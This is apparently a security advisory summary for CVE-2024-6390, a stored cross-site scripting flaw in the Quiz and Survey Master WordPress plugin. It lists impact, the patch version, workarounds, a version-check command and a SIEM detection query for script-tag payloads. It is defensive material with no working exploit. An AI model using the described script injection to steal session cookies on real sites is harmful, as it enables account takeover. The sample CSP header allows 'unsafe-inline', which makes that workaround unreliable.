CVE-2024-6390
📋 TL;DR
The Quiz and Survey Master WordPress plugin before version 9.1.0 has a stored cross-site scripting vulnerability in quiz settings. This allows authenticated users with contributor-level permissions or higher to inject malicious scripts that execute when other users view affected pages. WordPress sites using vulnerable plugin versions are affected.
💻 Affected Systems
- Quiz and Survey Master WordPress plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users, potentially leading to full site compromise.
Likely Case
Malicious contributors could embed scripts to display unwanted content, deface pages, or steal lower-privileged user sessions.
If Mitigated
With proper user access controls and content security policies, impact is limited to script execution in specific plugin contexts.
🎯 Exploit Status
Exploitation requires authenticated user with at least contributor permissions. Attack vectors are well-documented in WordPress XSS patterns.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.1.0
Vendor Advisory: https://wpscan.com/vulnerability/00586687-33c7-4d84-b606-0478b1063d24/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Quiz and Survey Master'. 4. Click 'Update Now' if available. 5. Alternatively, download version 9.1.0+ from WordPress.org and manually update.
🔧 Temporary Workarounds
Restrict User Roles
allLimit contributor and author roles from accessing quiz settings or restrict plugin access to trusted administrators only.
Content Security Policy
linuxImplement strict CSP headers to prevent script execution from untrusted sources.
Header set Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline' https://trusted.cdn.com;"
🧯 If You Can't Patch
- Disable the Quiz and Survey Master plugin entirely until patching is possible.
- Implement web application firewall rules to block XSS payloads in quiz parameter inputs.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Quiz and Survey Master version number.Check Version:
wp plugin list --name='quiz-and-survey-master' --field=versionVerify Fix Applied:
Confirm plugin version is 9.1.0 or higher in WordPress admin plugins page.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /wp-admin/admin-ajax.php with quiz-related parameters containing script tags
- Multiple failed XSS attempts in web server logs
Network Indicators:
- HTTP requests with encoded script payloads in quiz parameter values
- Outbound connections to suspicious domains from quiz pages
SIEM Query:
source="web_logs" AND (uri_path="/wp-admin/admin-ajax.php" OR uri_path="/wp-admin/admin.php") AND (param="quiz" OR param="survey") AND (content="<script" OR content="javascript:")